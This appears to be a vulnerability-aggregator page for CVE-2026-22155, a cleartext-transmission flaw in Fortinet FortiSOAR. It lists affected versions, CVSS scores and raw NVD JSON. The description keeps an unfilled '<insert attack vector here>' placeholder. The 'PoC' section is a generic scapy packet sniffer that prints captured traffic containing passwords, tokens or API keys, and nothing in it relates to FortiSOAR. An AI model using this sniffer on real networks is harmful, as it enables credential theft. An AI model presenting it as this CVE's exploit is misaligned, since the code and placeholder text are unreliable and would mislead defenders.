Security Vulnerability Report
中文
CVE-2026-22155 CVSS 6.5 MEDIUM

CVE-2026-22155

Published: 2026-04-14 16:16:36
Last Modified: 2026-05-06 15:57:51

Description

A cleartext transmission of sensitive information vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow attacker to information disclosure via <insert attack vector here>

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* - VULNERABLE
FortiSOAR PaaS 7.6.0 - 7.6.3
FortiSOAR PaaS 7.5.0 - 7.5.2
FortiSOAR PaaS 7.4 (所有版本)
FortiSOAR PaaS 7.3 (所有版本)
FortiSOAR On-premise 7.6.0 - 7.6.2
FortiSOAR On-premise 7.5.0 - 7.5.1
FortiSOAR On-premise 7.4 (所有版本)
FortiSOAR On-premise 7.3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-22155: Cleartext transmission of sensitive information # This script demonstrates how an attacker could sniff network traffic to capture unencrypted data. import scapy.all as scapy def sniff_packets(interface): print(f"[*] Starting packet capture on {interface}...") # Filter for HTTP traffic (port 80) or specific FortiSOAR ports if known scapy.sniff(iface=interface, store=False, prn=process_packet) def process_packet(packet): if packet.haslayer(scapy.TCP) and packet.haslayer(scapy.Raw): payload = packet[scapy.Raw].load # Check for potential sensitive keywords if b"password" in payload or b"token" in payload or b"api_key" in payload: print(f"[!] Potential sensitive data captured: {payload}") if __name__ == "__main__": # Usage: python3 poc.py <network_interface> # Example: python3 poc.py eth0 import sys if len(sys.argv) != 2: print("Usage: python3 poc.py <interface>") else: sniff_packets(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22155", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:36.267", "lastModified": "2026-05-06T15:57:51.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cleartext transmission of sensitive information vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow attacker to information disclosure via <insert attack vector here>"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3.0", "versionEndExcluding": "7.5.3", "matchCriteriaId": "CD42D7DF-B095-44E1-B7E1-D203678DF740"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "6E11F916-A349-4C7F-8F39-2A3C9F2FB006"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-106", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}